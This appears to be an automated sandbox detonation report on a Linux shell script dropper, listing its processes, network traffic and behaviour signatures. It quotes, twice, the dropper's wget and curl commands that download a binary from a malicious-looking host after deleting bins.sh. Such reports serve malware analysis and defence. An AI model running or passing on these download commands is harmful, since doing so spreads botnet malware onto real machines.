/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.193.91:443 tcp
GB 195.181.164.20:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:58

Reported

2024-10-21 02:01

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

23s

Command Line

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A